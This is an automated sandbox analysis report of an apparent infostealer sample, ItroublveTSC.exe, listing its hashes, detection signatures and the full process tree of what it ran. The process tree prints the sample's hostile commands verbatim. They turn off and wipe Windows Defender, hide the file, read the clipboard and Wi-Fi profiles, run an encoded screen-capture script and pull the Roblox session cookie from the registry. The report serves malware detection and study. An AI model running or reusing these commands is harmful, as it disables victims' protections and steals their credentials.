Analysis

  • max time kernel
    99s
  • max time network
    121s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241211-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    12-12-2024 03:08

General

  • Target

    ItroublveTSC.exe

  • Size

    7.6MB

  • MD5

    d3ef02070bfa081974b1c1d3d479d1af

  • SHA1

    371913c4493df24aff9dd5511445d5a6d8c3e79c

  • SHA256

    ae5c57ff6ae53782f3767e0fcffcafb0368af0530c8197cd0fcaab1ffda98859

  • SHA512

    601c97e5fafd8a4ce57b8bc0301bec60d927c0b8ba1366e42a3bd6e0830f9c6448506df7586943b0c4f8763e67620ab6d5ec3967e61ba8bde43348aa004f5872

  • SSDEEP

    98304:MUvsBAgasrYqwRhI3l72Qj1qCVgWBg+uoQs+YX5dfXHzjNZnXscacRX1t9XMGh8j:MMgIqwfI9jUC2gYBYv3vbW+DcGiwwnL

Malware Config

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 52 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ItroublveTSC.exe
    "C:\Users\Admin\AppData\Local\Temp\ItroublveTSC.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3748
    • C:\Users\Admin\AppData\Local\Temp\ItroublveTSC.exe
      "C:\Users\Admin\AppData\Local\Temp\ItroublveTSC.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1160
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ItroublveTSC.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2784
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ItroublveTSC.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4520
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5032
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2416
        • C:\Program Files\Windows Defender\MpCmdRun.exe
          "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
          4⤵
          • Deletes Windows Defender Definitions
          PID:4668
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Se o local estiver neste computador, verifique se o dispositivo ou a unidade está conectada, ou se o disco está inserido, e tente novamente. Se o local estiver em uma rede, confirme se você está conectado à rede ou à internet e tente novamente. Se ela ainda não puder ser localizada, talvez tenha sido movida ou excluída.', 0, 'O local não está disponível', 0+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1576
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Se o local estiver neste computador, verifique se o dispositivo ou a unidade está conectada, ou se o disco está inserido, e tente novamente. Se o local estiver em uma rede, confirme se você está conectado à rede ou à internet e tente novamente. Se ela ainda não puder ser localizada, talvez tenha sido movida ou excluída.', 0, 'O local não está disponível', 0+16);close()"
          4⤵
            PID:3216
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4048
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:220
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3600
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3356
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2828
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
            4⤵
              PID:2860
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1976
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              4⤵
                PID:2972
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4120
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                • Suspicious behavior: EnumeratesProcesses
                PID:3212
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1636
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                • Suspicious behavior: EnumeratesProcesses
                PID:1412
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\ItroublveTSC.exe""
              3⤵
              • Hide Artifacts: Hidden Files and Directories
              • Suspicious use of WriteProcessMemory
              PID:1416
              • C:\Windows\system32\attrib.exe
                attrib +h +s "C:\Users\Admin\AppData\Local\Temp\ItroublveTSC.exe"
                4⤵
                • Views/modifies file attributes
                PID:1828
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌  ‌.scr'"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1340
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌  ‌.scr'
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:1068
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4620
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:4552
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3796
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:2692
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2856
              • C:\Windows\System32\Wbem\WMIC.exe
                WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:3728
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              3⤵
              • Clipboard Data
              PID:1532
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-Clipboard
                4⤵
                • Clipboard Data
                • Suspicious behavior: EnumeratesProcesses
                PID:1868
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
                PID:4628
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  4⤵
                  • Enumerates processes with tasklist
                  PID:2568
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                  PID:4328
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:4300
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                    3⤵
                    • System Network Configuration Discovery: Wi-Fi Discovery
                    PID:4236
                    • C:\Windows\system32\netsh.exe
                      netsh wlan show profile
                      4⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Network Configuration Discovery: Wi-Fi Discovery
                      PID:4052
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "systeminfo"
                    3⤵
                      PID:3028
                      • C:\Windows\system32\systeminfo.exe
                        systeminfo
                        4⤵
                        • Gathers system information
                        PID:4072
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                      3⤵
                        PID:2284
                        • C:\Windows\system32\reg.exe
                          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                          4⤵
                            PID:3152
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                          3⤵
                            PID:1676
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                              4⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:496
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lxlnwhys\lxlnwhys.cmdline"
                                5⤵
                                  PID:2108
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC052.tmp" "c:\Users\Admin\AppData\Local\Temp\lxlnwhys\CSCC59ECA2A935F4D01AA9A44571895E878.TMP"
                                    6⤵
                                      PID:4524
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                3⤵
                                  PID:2640
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    4⤵
                                      PID:1284
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    3⤵
                                      PID:1416
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        4⤵
                                          PID:4972
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                        3⤵
                                          PID:2948
                                          • C:\Windows\system32\attrib.exe
                                            attrib -r C:\Windows\System32\drivers\etc\hosts
                                            4⤵
                                            • Drops file in Drivers directory
                                            • Views/modifies file attributes
                                            PID:3236
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          3⤵
                                            PID:3368
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              4⤵
                                                PID:2276
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                              3⤵
                                                PID:1132
                                                • C:\Windows\system32\attrib.exe
                                                  attrib +r C:\Windows\System32\drivers\etc\hosts
                                                  4⤵
                                                  • Drops file in Drivers directory
                                                  • Views/modifies file attributes
                                                  PID:2784
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                3⤵
                                                  PID:1164
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    4⤵
                                                      PID:2836
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                    3⤵
                                                      PID:4752
                                                      • C:\Windows\system32\tasklist.exe
                                                        tasklist /FO LIST
                                                        4⤵
                                                        • Enumerates processes with tasklist
                                                        PID:3100
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      3⤵
                                                        PID:564
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          4⤵
                                                            PID:2140
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                          3⤵
                                                            PID:4556
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                              4⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:328
                                                          • C:\Windows\system32\cmd.exe
